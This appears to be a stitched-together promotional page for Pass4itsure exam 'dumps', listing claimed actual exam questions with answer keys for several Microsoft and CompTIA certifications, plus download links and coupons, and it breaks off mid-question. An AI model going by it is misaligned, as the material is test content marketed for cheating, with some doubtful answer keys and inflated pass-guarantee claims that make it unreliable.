Study Tips For Success at First Attempt of Your Microsoft 70-741 Exam with 100% Guarantee

Do you want to take the Microsoft 70-741 exam? I would like to share some tips for preparing for the Microsoft 70-741 exam. Recently, I passed the 70-741 exam with a score of 92%. I tried many ways to pass the 70-741 exam and then found the ideal exam guide. Here, I received very useful training materials for the Microsoft 70-741 exam and verified by Microsoft experts. You can also pass the 70-741 exam easily. Simply go to https://www.pass4itsure.com/70-741.html and download the 70-741 dumps and pass it on the first attempt.

The latest Microsoft 70-741 pdf free download

From Google Drive:

[PDF] Free 70-741 pdf dumps: https://drive.google.com/open?id=1tFtKCUyMkbh4EAQwnfhp76Ud-xQCesIM

[Video] Free 70-741 pdf dumps sharing:

https://youtu.be/xa6WcS4zF18

Preparing for 70-741 Exam

70-741-exam-step

Exam By:Microsoft
Exam Code:70−741
Exam Name:Networkingwith Windows Server2016
Related Certification(s):MCSA

Maybe you are also interested in this.

[New Version] Best Microsoft 70-742 Dumps Practice Test Exam Questions And Answers Youtube Identity with Windows Server 2016

Taking a Microsoft certification exam “cold” is a good way to end up retaking a Microsoft certification exam.

Please see the exams for the process I listed below.

Step 1. Learn what you need to know

How do you know the content of the exam? The terrible answer is that you can’t do it at least. No matter how much you learn, you may encounter problems with any material you have never seen before. However, please be assured that there is only one place where you can find most of the topics to be discussed in the exam. Microsoft publishes an exam description page for each exam they manage.

  • Implement Domain Name System (DNS) (15-20%)
  • Implement DHCP and IPAM (25-30%)
  • Implement Network Connectivity and Remote Access Solutions (20-25%)
  • Implement Core and Distributed Network Solutions (15-20%)
  • Implement an Advanced Network Infrastructure (15-20%)

This is the first place I learned when I was learning the Windows Server 2016 exam network. The targets displayed in the screenshot are divided into sub-goals. Each subgoal has a set of skills listed in paragraphs.

This became my study guide. I make sure I understand the details of each skill in the list.

Step 2. Find good study materials

You need very good learning materials.As a Microsoft Certified Trainer, I have the experience of collecting and evaluating which resources are best for learners to make the most of their experience. This is my three recommendations for Microsoft learning materials:

Microsoft Certified Curriculum

Visit the official Microsoft course: 20741A: Networking with Windows Server 2016

Written by experts in the field and tend to be consistent with the exam objectives. This does not mean that the Microsoft Certified Network Assistant exam questions will be written word by word directly from the content, but most of the exam’s concepts will be covered in detail in the exam content. Here, it is useful to list skills. I use the skill list as a guide to the content.

Publisher Learning Guide

If you don’t have the ability to take an official Microsoft course, there are plenty of books to study as a guide.

Online Resources

Microsoft has released almost all of Microsoft’s content on TechNet and MSDN, so it’s quite possible to cover any technical details that can be asked in TechNet.

Sanctioned “brain dumps”

Pass4itsure have best Microsoft 70-741 Dumps for you to prepare Networking with Windows Server 2016 exam, but most of the MCSA students like to take the help of the Pass4itsure, so that they don’t have to face much inconvenience when MCSA 70-741 exam prep for their Microsoft 70-741 questions.

Step 3. Take notes

I write down any content that might be suitable for the exam. The act of writing information fixes it in my short-term memory.

Step 4. Practice

Practice is very important. It is very important to actually set up and manage the system for which the certification exam is to be conducted. Find some exam skills and get an idea of the actual situation of the exam.

Step 5. Manage exam time

When you start the exam, the system will provide you with the total number of questions and available time. Do the calculations quickly (you will have something to write) and find out how long each problem is. Although I won’t spend time on every issue, I will put it in my mind to make sure I don’t run out of time.

If you spend a few minutes on the question and don’t have an answer, guess, mark it out and continue. If time permits, you can review the question back, but only if you are sure of the correct answer or if your guess is wrong.

Pass4itsure gives you a chance to get instant success in the 70-741 exam

Pass4itsure

Here are some unique:

Latest Microsoft 70-741 Actual Free Exam Questions

QUESTION 1
You have a server named Server1 that runs Windows Server 2016. You install the Hyper-V server role on Server1.
Server1 has eight network adapters that are dedicated to virtual machines. The network adapters are Remote Direct
Memory
Access (RDMA)-enabled.
You plan to use Software Defined Networking (SDN). You will host the virtual machines for multiple tenants on the
Hyper-V host.
You need to ensure that the network connections for the virtual machines are resilient if one or more physical network
adapters fail.
What should you implement?
A. single root I/O virtualization (SR-IOV)
B. NIC Teaming on the Hyper-V host
C. virtual Receive-side Scaling (vRSS)
D. Switch Embedded Teaming (SET)
Correct Answer: D

QUESTION 2
You have servers named Server1 and DHCP1. Both servers run Windows Server 2016. DHCP1 contains an IPv4 scope
named Scope1.
You have 1,000 client computers.
You need to configure Server1 to lease IP addresses for Scope1. The solution must ensure that Server1 is used to
respond to up to 30 percent of the DHCP client requests only.
You install the DHCP Server server role on Server1.
What should you do next?
A. From the DHCP console, run the Configure Failover wizard.
B. From Server Manager, install the Network Load Balancing feature.
C. From Server Manager, install the Failover Clustering feature.
D. From the DHCP console, create a superscope.
Correct Answer: A
https://technet.microsoft.com/en-us/library/hh831385(v=ws.11).aspx

QUESTION 3
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while
others might not have a correct solution.
After you answer a question in this sections, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
You have a server named Server1 that has the Network Policy and Access Services server role installed.
You create a Shared Secret Network Policy Server (NPS) template named Template1.
You need to view the shared secret string used for Template1.
Solution: From the Network Policy Server console, you export the templates, and you view the exported XML file.
Does this meet the goal?
A. Yes
B. No
Correct Answer: B

QUESTION 4
You have a server named Server1 that runs Windows Server 2016.
You install the DHCP Server server role on Server1.
You need to authorize DHCP on Server1.
What should you run?
A. dism.exe
B. dns.exe
C. dnscmd.exe
D. netsh.exe
E. Set-DhcpServerDatabase
F. Set-DhcpServerv4DnsSetting
G. Set-DhcpServerv6DnsSetting
H. Set-DNSServerSetting
Correct Answer: D

QUESTION 5
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while
others might not have a correct solution.
After you answer a question in this sections, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
Your network contains an Active Directory domain named adatum.com. The domain contains two DHCP servers named
Server1 and Server2.
Server1 has the following IP configuration.
Server2 has the following IP configuration.
Some users report that sometimes they cannot access the network because of conflicting IP addresses.
You need to configure DHCP to avoid leasing addresses that are in use already.
Solution: On Server1, you modify the EndRange IP address of the scope.
Does this meet the goal?
A. Yes
B. No
Correct Answer: A

QUESTION 6
Your network contains an Active Directory domain named contoso.com that contains a domain controller named DC1.
All DNS servers for the network run BIND 10.
Your perimeter network contains a DHCP server named DHCP1 that runs Windows Server 2016. DHCP1 is a member
of a workgroup named WORKGROUP. DHCP1 provides IP address leases to guests accessing the Wi-Fi network.
Several engineers access the network remotely by using a VPN connection to a remote access server that runs
Windows Server 2016. All of the VPN connections use certificate-based authentication and are subject to access
policies in
Network Policy Server (NPS). Certificates are issued by an enterprise certification authority (CA) named CA1.
All Windows computers on the network are activated by using Key Management Service (KMS). On-premises users use
Remote Desktop Services (RDS).
You plan to deploy IP Address Management (IPAM) to the network.
Which action can you perform on the network by using IPAM?
A. Audit user and device logon event from NPS.
B. Audit logon events on the RDS server.
C. Audit configuration changes to the remote access server.
D. Audit certificate enrollment requests on CA1.
Correct Answer: A
https://blogs.technet.microsoft.com/canitpro/2013/08/15/step-by-step-setup-windows-server-2012-ipam-in-yourenvironment/

QUESTION 7
Your network contains an Active Directory domain named contoso.com. The domain contains a DNS server named
Server1.
Server1 is configured to use a forwarder named Server2 that has an IP address of 10.0.0.10. Server2 can resolve
names hosted on the Internet successfully. Server2 hosts a primary DNS zone named adatum.com.
On Server1, you have the following zone configuration.

Pass4itsure 70-741 exam questions-q7

For each of the following statements, select Yes if the statement is true. Otherwise, select No.
Hot Area:

Pass4itsure 70-741 exam questions-q7-2

QUESTION 8
You have a Scale-Out File Server that has a share named Share1. Share1 contains a virtual disk file named Disk1.vhd.
You plan to create a guest failover cluster.
You need to ensure that you can use the virtual disk as a shared virtual disk for the gust failover cluster.
Which cmdlet should you use?
A. Optimize VHD
B. Optimize VHDSet
C. Convert-VHD
D. Set-VHD
Correct Answer: C

QUESTION 9
You have a server named Server1 that runs Windows Server 2016. Server1 is located on the perimeter network, and
only inbound TCP port 443 is allowed to connect Server1 from the Internet.
You install the Remote Access server role on Server1.
You need to configure Server1 to accept VPN connections over port 443.
Which VPN protocol should you use?
A. PPTP
B. SSTP
C. L2TP
D. IKEv2
Correct Answer: B
https://technet.microsoft.com/en-us/library/dd458955(v=ws.10).aspx

QUESTION 10
Your network contains multiple wireless access points (WAPs) that use WPA2-Personal authentication. The network
contains an enterprise root certification authority (CA).
The security administrator at your company plans to implement WPA2-Enterprise authentication on the WAPs.
To support the authentication change, you deploy a server that has Network Policy Server (NPS) installed.
You need to configure NPS to authenticate the wireless clients.
What should you do on the NPS server?
A. Add RADIUS clients and configure network policies.
B. Create a remote RADIUS server group and configure connection request policies.
C. Create a remote RADIUS server group and install a server certificate.
D. Add RADIUS clients and configure connection request policies.
Correct Answer: A
https://ittrainingday.com/2013/12/25/how-to-configure-a-windows-radius-server-for-802-1x-wireless-or-wiredconnections/

QUESTION 11
You have an IP Filters Network Policy Server (NPS) template that is used by an NPS policy. The IP filters are
configured as shown in the following exhibit.

Pass4itsure 70-741 exam questions-q11

Use the drop-down menus to select the answer choice that completes each statement based on the information
presented in the graphic. NOTE: each correct selection is worth one point.
Hot Area:

Pass4itsure 70-741 exam questions-q11-2

QUESTION 12
You have multiple servers that run Windows Server 2016. You have a server named Server1 that is configured
as a domain controller and a DNS server.
You need to create an Active Directory-integrated zone on Server1.
What should you run?
A. dism.exe
B. dns.exe
C. dnscmd.exe
D. netsh.exe
E. Set-DhcpServerDatabase
F. Set-DhcpServerv4DnsSetting
G. Set-DhcpServerv6DnsSetting
H. Set-DNSServerSetting
Correct Answer: C

QUESTION 13
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while
others might not have a correct solution.
After you answer a question in this sections, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
You have a server named Server1 that has the Network Policy and Access Services server role installed.
You create a Shared Secret Network Policy Server (NPS) template named Template1.
You need to view the shared secret string used for Template1.
Solution: From Windows PowerShell, you run Get-NpsSharedSecretTemplate -Name Template1 .
Does this meet the goal?
A. Yes
B. No
Correct Answer: B

Our 70-741 exam dumps will clear all your questions and help you pass the 70-741 exam on your first try. This 70-741 practice test will help you understand the real test scenario. In addition, you can get a 70-741 PDF dumps from https://www.pass4itsure.com/70-741.html.

Where to get the latest Microsoft other Certification MS-202 dumps and MS-202 practice test questions and answers | bsabio

pass4itsure MS-202 exam dumps

The latest updates Microsoft other Certification MS-202 dumps, MS-202 pdf free download, MS-202 exam practice test questions to improve your skills.
“Microsoft 365 Messaging Administrator Certification Transition” MS-202 Exam. Easy to pass the exam: Pass4itsure.com!

The latest Microsoft other Certification MS-202 pdf free download

[PDF] Free Microsoft MS-202 pdf dumps download from Google Drive: https://drive.google.com/open?id=1Lj1w4lO3-ya7SQ-nWcn5yD43HUO9lbWV

[PDF] Free Full Microsoft pdf dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

Valid information provided by Microsoft officials

Exam MS-202: Microsoft 365 Messaging Administrator Certification Transition: https://www.microsoft.com/en-us/learning/exam-ms-202.aspx

This exam is intended only for candidates who have taken Exam 70-345: Designing and Deploying Microsoft Exchange Server 2016. If you have not taken Exam 345, you will not earn certification by taking this exam.

Candidates for this exam are Messaging Administrators who deploy, configure, manage, troubleshoot, and monitor recipients, permissions,
mail protection, mail flow, and public folders in both on-premises and cloud enterprise environments.

Messaging Administrators are responsible for managing hygiene, messaging infrastructure, hybrid configuration, migration, disaster recovery, high availability, and client access.

pass4itsure MS-202 exam Skills measured

  • Manage modern messaging infrastructure (20-25%)
  • Manage mail flow topology (5-10%)
  • Manage recipients and devices (10-15%)
  • Plan and implement a hybrid configuration and migration (20-25%)
  • Secure the messaging environment (35-40%)

Latest Microsoft other Certification MS-202 Exam Practice Test Questions and Answers

QUESTION 1
You have a hybrid deployment of Microsoft Exchange Server 2019 and Microsoft Office 365. In Exchange Online, you
create an archive mailbox for each user.
Users who have a mailbox in the on-premises Exchange organization report that they cannot access their archive
mailbox. You verify that users who have a mailbox in Office 365 can access their archive mailbox successfully.
You need to resolve the issue.
What should you modify?
A. the sharing policy
B. the mailbox permissions
C. the organization relationship
D. the device tenant policy
Correct Answer: C
References: https://docs.microsoft.com/en-us/powershell/module/exchange/sharing-and-collaboration/set-organizationrelationship?view=exchange-ps

 

QUESTION 2
You need to recommend a deployment plan that meets the technical requirements for the mailbox databases. What
should you include in the recommendation?
A. Deploy 10 Exchange servers to the main office and one Exchange server to each branch office. Create two mailbox
databases on each server.
B. Deploy one Exchange server to each office. Create two mailbox databases on each server. Create copies of the
databases on another server.
C. Deploy 11 Exchange servers to the main office and one Exchange server to each branch office. Create one mailbox
database on each server.
D. Deploy one Exchange server to the main office and two Exchange servers to each branch office. Create one mailbox
database on each server.
Correct Answer: B


QUESTION 3
You have a Microsoft Exchange Server 2019 organization that has the topology shown in the following exhibit.pass4itsure ms-202 exam question q3

The organization contains the servers shown in the following table.

pass4itsure ms-202 exam question q3-1

The organization contains the mailboxes shown in the following table.

pass4itsure ms-202 exam question q3-2

For each of the following statements, select Yes if the statement is true. Otherwise, select No.
Hot Area:

pass4itsure ms-202 exam question q3-3

Correct Answer:

pass4itsure ms-202 exam question q3-4

 

QUESTION 4
You have a Microsoft Exchange Server 2013 organization that has the following configurations:
The forest functional level of Active Directory in Windows Server 2008 R2
The domain controllers in Active Directory Windows Server 2012 R2.
The Exchange servers run Windows Server 2012 Datacenter
You plan to upgrade the organization to Exchange Server 2019.
You need to ensure that the organization meets the minimum supported requirements for the upgrade.
What should you do?
A. Raise the forest functional level to Windows Server 2012 R2
B. Upgrade the domain controllers to Windows Server 2016
C. Upgrade the Exchange servers to Windows Server 2016
D. Upgrade the Exchange servers to Windows Server 2019
Correct Answer: A
References: https://docs.microsoft.com/en-us/exchange/plan-and-deploy/system-requirements?view=exchserver-2019

 

QUESTION 5
You have a Microsoft Exchange Server 2019 hybrid deployment that contains the users shown in the following table.pass4itsure ms-202 exam question q5

You need to provide each user with an archive mailbox that is stored in Exchange Online.
Which admin center should you use to perform the configuration for each user? To answer, drag the appropriate admin
centers to the correct users. Each admin center may be used once, or not at all.
You may drag the split bar between the panes or scroll to view content.
NOTE: Each correct selection is worth one point.
Select and Place:

pass4itsure ms-202 exam question q5-1

Correct Answer:

pass4itsure ms-202 exam question q5-2

 

QUESTION 6
You need to implement a solution that meets the technical requirements for the retention of junk email, sent items, and
deleted items.
What is the minimum number of retention policies and retention tags you should use? To answer, select the appropriate
options in the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure ms-202 exam question q6

Correct Answer:

pass4itsure ms-202 exam question q6-1

 

QUESTION 7
Your company has a Microsoft Exchange Server 2019 organization.
You are auditing the litigation hold on the mailboxes of the company\\’s research and development department.
You discover that the mailbox of a user named User1 has a Litigation Hold enabled.
You need to discover who placed the Litigation hold on the mailbox of User1, and when the Litigation Hold was
enabled.
Which two actions should you perform? Each correct answer presents part of the solution.
NOTE: Each correct selection is worth one point.
A. From the Exchange admin center, run an In-place eDiscovery and Hold report.
B. From the Exchange admin center, run a per-mailbox Litigation Hold report.
C. From PowerShell, run the Get-MailboxStatistics cmdlet.
D. From PowerShell, run the Get-Mailbox cmdlet.
Correct Answer: BC

 

QUESTION 8
Your network contains an Active Directory domain named Fabrikam.com. You have a Microsoft Exchange Server 2019
an organization that contains two Mailbox servers. The servers are members of a database availability group (DAG).
You plan to implement an Exchange hybrid deployment.
You are evaluating the use of the Exchange Modern Hybrid connection option during the hybrid deployment.
What are two benefits of using Exchange Modern Hybrid instead of Exchange Classic Hybrid? Each correct answer
presents part of the solutions.
NOTE: Each correct selection is worth one point.
A. uses Organization Configuration Transfer to configure Exchange Online
B. allows federated sharing between the on-premises organization and Exchange Online
C. allows the use of Microsoft Azure Multi-Factor Authentication (MFA) for on-premises users
D. eliminates the need to purchase publicly trusted certificates for communication between the on-premises organization
and Exchange Online
E. preserves mailbox quotas when mailboxes are moved between the on-premises organization and Exchange Online
Correct Answer: AD

 

QUESTION 9
You need to recommend a solution to meet the technical requirements for the managers. What should you recommend
creating for the mailboxes of the managers?
A. a transport agent
B. a separate Exchange server
C. a separate mailbox database
D. an audit policy
Correct Answer: C


QUESTION 10
You have a Microsoft 365 subscription that uses a default domain named contoso.com.
Users report that email messages from a domain named fabrikam.com are identified as spam even though the
messages are legitimate.
You need to prevent messages from fabrikam.com from being identified as spam.
What should you do?
A. Edit the default mail flow rule to bypass the spam filter.
B. Create a new remote domain.
C. Edit a spam filter policy.
D. Create a new malware filter policy.
Correct Answer: C

 

QUESTION 11
Use the drop-down menus to select the answer choice that completes each statement based on the information
presented in the graphic.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure ms-202 exam question q11

Correct Answer:

pass4itsure ms-202 exam question q11-1

 

QUESTION 12
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while others might not have a correct solution.
After you answer a question in this section, you will NOT be able to return to it. As a result, these questions will not
appear in the review screen.
You have a Microsoft Exchange server 2019 organization.
You discover that users rarely delete items from their Sent Items folder and their Deleted Items folder.
You need to recommend a solution to automatically reduce the size of the primary mailbox of each user.
Solution: You recommend configuring a retention policy that contains two default policy tags.
Does this meet the goal?
A. Yes
B. No
Correct Answer: B
This would work and it needs no user intervention but it would apply to all folders. Furthermore, you only need one
default tag, not two.

 

QUESTION 13
You have a Microsoft Exchange Server 2019 organization that contains 5,000 mailboxes.
You purchase a Microsoft 365 E5 subscription and create a hybrid deployment. You configure all MX records to point to
Exchange Online.
You purchase 2,000 Microsoft 365 E5 licenses, and you migrate 2,000 mailboxes to Exchange Online. You need to
identify which additional licenses must be purchased. The solution must minimize costs.
Which licenses should you identify?
A. an Exchange Online Protection (EOP) license for each on-premises mailbox
B. Microsoft Office 365 Enterprise E1 licenses for the on-premises users
C. Enterprise Mobility + Security E5 licenses for the Exchange Online users
D. Microsoft Azure Active Directory Premium P2 licenses for all users
Correct Answer: B
References: https://products.office.com/en-gb/business/compare-more-office-365-for-business-plans

Follow Pass4itsure free sharing of YouTube channels

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Latest Microsoft MS-202 YouTube videos:

Follow us! We update the latest effective exam dumps throughout the year to help you improve your skills! Microsoft other Certification MS-202 dumps share for free! Easy via MS-202 exam: https://www.pass4itsure.com/MS-202.html (Q&As: 151)

Pass4itsure Promo Code 15% Off

pass4itsure MS-202 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the Microsoft MS-202 exam.
Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass MS-202 exam easily at first try.

why pass4itsure MS-202 dumps

Maybe you might like the exam questions and answers

Where to get the latest Microsoft Dynamics 365 for Sales MB-210 dumps and MB-210 practice test questions and answers | Bsabio

pass4itsure MB-210 dumps

The latest updates Microsoft Dynamics 365 for Sales MB-210 dumps, MB-210 pdf free download, MB-210 exam practice test questions to improve your skills. “Exam MB-210: Microsoft Dynamics 365 for Sales” MB-210 Exam. Easy to pass the exam: Pass4itsure.com!

latest Microsoft Dynamics 365 for Sales MB-210 pdf free download

[PDF] Free Microsoft MB-210 pdf dumps download from Google Drive: https://drive.google.com/open?id=1ToIGTCQpEGiS1lx2nRELmRwWVTe8n2lI

[PDF] Free Full Microsoft pdf dumps download from Google Drive: https://drive.google.com/open?id=1gdQrKIsiLyDEsZ24FxsyukNPYmpSUDDO

Valid information provided by Microsoft officials

Exam MB-210: Microsoft Dynamics 365 for Sales Customization and Configuration: https://www.microsoft.com/en-us/learning/exam-MB-210.aspx Candidates for this exam are Dynamics 365 functional consultants with sales expertise. Candidates are responsible for implementing solutions that support a sales life cycle to run efficiently and effectively to meet revenue targets, business strategies, and company objectives.

Candidates are responsible for configuring and expanding the core functionality of Leads, Contacts, Accounts, Opportunities and supporting
entities to map to the sales processes in place at the company. They identify opportunities to use PowerApps for mobile applications, Microsoft Flow for application integration, business process flows, and other automation tools to construct an application that supports and accelerates the “lead to cash journey.”

pass4itsure MB-210 exam Skills measured

Perform configuration (40-45%)

  • Configure sales settings
  • Configure processes
  • Create and configure sales visualizations
  • Configure integration with external sales applications

Manage core sales entities (20-25%)

  • Create and manage leads
  • Create and manage opportunities

Manage sales entities (35-40%)

  • Create and manage quotes
  • Create and manage sales order processing
  • Create and manage product and product catalog

Latest Microsoft Dynamics 365 for Sales MB-210 Exam Practice Test Questions and Answers

QUESTION 1
You are a Dynamics 365 for Sales administrator.
The sales team is having difficulty locating related products.
You need to make it easier for the sales team to find groups of products that are similar.
What should you use?
A. Related products
B. Product bundles
C. Product families
D. Product unit groups
Correct Answer: A
References: https://docs.microsoft.com/en-us/dynamics365/customer-engagement/sales-enterprise/define-related-products-increase-chances-sales

 

QUESTION 2
You manage Dynamics 365 environments for client organizations.
A client suspects they are losing business. The client must be able to capture reasons each time an opportunity is lost.
You need to configure Dynamics 365 to ensure that you can capture the required information.
Which field should you configure?
A. Opportunity status reason
B. Opportunity close status
C. Opportunity status
D. Opportunity close status reason
Correct Answer: A

 

QUESTION 3
You are a salesperson using Dynamics 365 for Sales.
You need to be able to modify the product price on an active invoice that uses current pricing.
What should you do?
A. Set the Invoice Product to Override Price
B. Set an End Date for the Price List to ensure the Price List is expired
C. Set an End Date for the Price List to ensure the Price List is not expired
D. Set the Invoice Product to Use Default
Correct Answer: A

 

QUESTION 4
You manage a Dynamics 365 environment for Sales. You create the following rule items to respond to inbound emails
from potential customers:
Emails that contain the words support or help must create a new high-priority case.
Emails that contain the words buy or purchase must create a warm-lead record. The words buy and purchase are more
important than support or help.
Emails that specifically mention ProductA must always create a hot lead for that product regardless of other words
mentioned.
If none of the targeted words are present in an email, a cold lead must be created.
You need to configure the order in which rule items are processed.
In which order should you run the rule items? To answer, move all actions from the list of actions to the answer area and
arrange them in the correct order.
Select and Place:pass4itsure mb-210 exam question q4

Correct Answer:

pass4itsure mb-210 exam question q4-1

 

QUESTION 5
You have opportunities that have values in multiple currencies. The currency exchange rate automatically updates.
You need to ensure that currency values are accurately reported.
When is the new currency exchange rate applied to the opportunity records?
A. when a change is made to a currency field
B. when a user opens the opportunity record
C. when a user manually recalculates opportunity
D. when the calculate rollup field system job for the msdyn_projectteam entity runs
Correct Answer: A

 

QUESTION 6
The product development team for a toy company creates a new remote-control toy.
You need to create the necessary records and record relationships to sell the product.
Which five records and/or components should you configure in sequence? To answer, move the appropriate records
and/or components from the list of records and components to the answer area and arrange them in the correct order.
NOTE: More than one order of answer choices is correct. You will receive credit for any of the correct orders you select.
Select and Place:pass4itsure mb-210 exam question q6

Correct Answer:

pass4itsure mb-210 exam question q6-1

 

QUESTION 7
You are a Dynamics 365 for Sales administrator. You are setting up a product catalog.
You need to configure the base unit group.
Which quantity or measurement should you configure?
A. the highest needed to sell the product or service
B. the least frequently used to sell the service
C. the most frequently used to sell the service
D. the lowest needed to sell the product or service
Correct Answer: D
References: https://docs.microsoft.com/en-us/dynamics365/customer-engagement/sales-professional/create-unit-group-add-units

 

QUESTION 8
A company uses Dynamics 365 for Sales.
You create a new quote and associate an opportunity to the quote.
You need to display all your items from the opportunity in the quote.
What should you do?
A. Activate the quote
B. Select Get Products from the command bar in the Quote entity
C. Select Add Line Items on the Opportunity entity
D. Select Recalculate from the command bar on the Opportunity entity
Correct Answer: B

 

QUESTION 9
A customer places an order that includes all of the products from a previous order.
You need to add products from the previous order to the new order.
From which sources can you retrieve the list of products? To answer, select the appropriate options in the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure mb-210 exam question q9

Correct Answer:

pass4itsure mb-210 exam question q9-1

 

QUESTION 10
Note: This question is part of a series of questions that present the same scenario. Each question in the series contains
a unique solution that might meet the stated goals. Some question sets might have more than one correct solution,
while
others might not have a correct solution.
After you answer a question, you will NOT be able to return to it. As a result, these questions will not appear in the
review screen.
A company plans to move its headquarters from the United States to Europe.
You need to round all currency values to four decimal places and display the correct currency symbol.
Solution: Change the default currency.
Does the solution meet the goal?
A. Yes
B. No
Correct Answer: B

 

QUESTION 11
A company uses Dynamics 365 for Sales.
You need to change the description field on the quote.
Which state allows you to make the change?
A. Closed
B. Active
C. Draft
D. Won
Correct Answer: C

 

QUESTION 12
You are a salesperson using Dynamics 365. You receive customer phone calls and manage leads.
You need to qualify leads and send phone calls to sales representatives.
How should you manage each of the following situations? To answer, select the appropriate options in the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure mb-210 exam question q12

Correct Answer:

pass4itsure mb-210 exam question q12-1

 

QUESTION 13
You are a Dynamics 365 for Sales environment.
You need to implement the Social Selling Assistant.
What should you configure? To answer, select the appropriate options in the answer area.
NOTE: Each correct selection is worth one point.
Hot Area:pass4itsure mb-210 exam question q13

Correct Answer:

pass4itsure mb-210 exam question q13-1

Follow Pass4itsure free sharing of YouTube channels

We offer more ways to make it easier for everyone to learn, and YouTube is the best tool in the video. Follow channels: https://www.youtube.com/channel/UCTP5RClZrtMxtRkSvIag0DQ/videos get more useful exam content.

Latest Microsoft MB-210 YouTube videos:

Follow us! We update the latest effective exam dumps throughout the year to help you improve your skills! Microsoft Dynamics 365 for Sales MB-210 dumps share for free! Easy via MB-210 exam: https://www.pass4itsure.com/MB-210.html (Q&As: 70)

Pass4itsure Promo Code 15% Off

pass4itsure MB-210 coupon

Why Choose Pass4itsure?

Pass4itsure is the best provider of IT learning materials and the right choice for you to prepare for the Microsoft MB-210 exam. Other brands started earlier, but the price is relatively expensive and the questions are not the newest. Pass4itsure provides the latest real questions and answers with the lowest prices, help you pass MB-210 exam easily at first try.

why pass4itsure MB-210 dumps

Maybe you might like the exam questions and answers

Latest CompTIA Other Certification 220-1002 exam dumps, 220-1002 Exam Practice Tests | 100% Free

pass4itsure 220-1002 dumps

Easily pass the CompTIA Other Certification 220-1002 exam: “CompTIA A+ 220-1002 covers installing and configuring operating systems, expanded security, software troubleshooting and operational procedures.”- https://www.pass4itsure.com/220-1002.html (Q&As: 152) Free share the latest 220-1002 dumps questions and answers!
Practice the test online! Improve your skills and exam experience!

Download CompTIA Other Certification 220-1002 PDF Online

[PDF] Free CompTIA 220-1002 pdf dumps download from Google Drive: https://drive.google.com/open?id=1yD9TyLqEihzKBDE1hIMC_hW8FpiLDdnW

[PDF] Free Full CompTIA pdf dumps download from Google Drive: https://drive.google.com/open?id=1QYm4eH6gp3sWG4yKbFHh0mGtpGdzOlcV

Valid information provided by CompTIA officials

A+ (Plus) Certification | CompTIA IT Certifications: https://certification.comptia.org/certifications/a

Latest effective CompTIA Other Certification 220-1002 Exam Practice Tests

QUESTION 1
A computer becomes infected with malware, which manages to steal all credentials stored on the PC. The malware then
uses elevated credentials to infect all other PCs at the site. Management asks the IT staff to take action to prevent this
from reoccurring. Which of the following would BEST accomplish this goal?
A. Use an antivirus product capable of performing heuristic analysis
B. Use a host-based intrusion detection system on each computer
C. Disallow the password caching of accounts in the administrator’s group
D. Install a UTM in between PC endpoints to monitor for suspicious traffic
E. Log all failed login attempts to the PCs and report them to a central server
Correct Answer: A

 

QUESTION 2
A technician is installing a private PC in a public workspace. Which of the following password practices should the
technician implement on the PC to secure network access?
A. Remove the guest account from the administrator’s group
B. Disable single sign-on
C. Issue a default strong password for all users
D. Require authentication on wake-up
Correct Answer: D

 

QUESTION 3
A technician is installing Windows 7 64-bit OS on a VM but keeps getting errors. The specifications for the malware are:
Two 1GHz CPUs
2GB of memory
15GB hard drive
800×600 screen resolution
Which of the following should the technician do to resolve the problem?
A. Increase the number of CPUs
B. Increase the amount of memory
C. Increase the amount of hard drive space
D. Increase the screen resolution
Correct Answer: C

 

QUESTION 4
In which of the following file extension types would a user expect to see the command. “net use T:\\server\files\\’?
A. .bat
B. .vbs
C. .js
D. .py
Correct Answer: A

 

QUESTION 5
A user\\’s phone contains customer\\’s PII. The user cannot have the phone automatically wiped because the data is
very valuable. Which of the following is the BEST method of securing the phone?
A. Fingerprint lock
B. Passcode lock
C. Swipe lock
D. PIN lock
Correct Answer: A

 

QUESTION 6
A security team is auditing a company\\’s network logs and notices that a USB drive was previously inserted into several
of the servers. Many login attempts were then successfully performed using common login information. Which of the following actions should be taken to close the vulnerability? (Select two.)
A. Disable guest account
B. Remove admin permissions
C. Modify AutoRun settings
D. Change default credentials
E. Run OS security updates
F. Install a software firewall
Correct Answer: AC

 

QUESTION 7
A network administrator notifies a technician that the company is experiencing a DDoS attack. Several internal Windows
PCs are the source of the traffic. The network administrator gives the technician the Windows computer names and
states they be scanned and cleaned immediately.
With which of the following types of infections are the PCs MOST likely infected? (Select two.)
A. Spyware
B. Zombies
C. Virus
D. Ransomware
E. Worm
F. Botnet
Correct Answer: BE

 

QUESTION 8
Which of the following installation types would require the use of an answer file to install the OS?
A. Unattended
B. Clean
C. Repair
D. Upgrade
Correct Answer: A

 

QUESTION 9
A manager requests remote access to a server after hours and on weekends to check data. The manager insists on
using the server. Before granting the access, which of the following is the MOST important step a technician can take to
protect against possible infection?
A. Create a policy to remove Internet access from the server during off hours
B. Set the local antivirus software on the server to update and scan daily
C. Ensure the server is patched with the latest security updates
D. Educate the manager on safe Internet browsing practices
Correct Answer: C

 

QUESTION 10
A user calls the help desk regarding a new Windows issues that started in the morning. The user can no longer use any
locally attached devices, such as a mouse or a printer, and a reboot did not fix the problem. Which of the following
would MOST likely fix the issue?
A. Roll back updates
B. Disable the Windows Update service
C. Check for updates
D. Restore hidden updates
Correct Answer: A

 

QUESTION 11
A department in an organization set up a proxy server to manage its Internet stage. A technician is configuring the
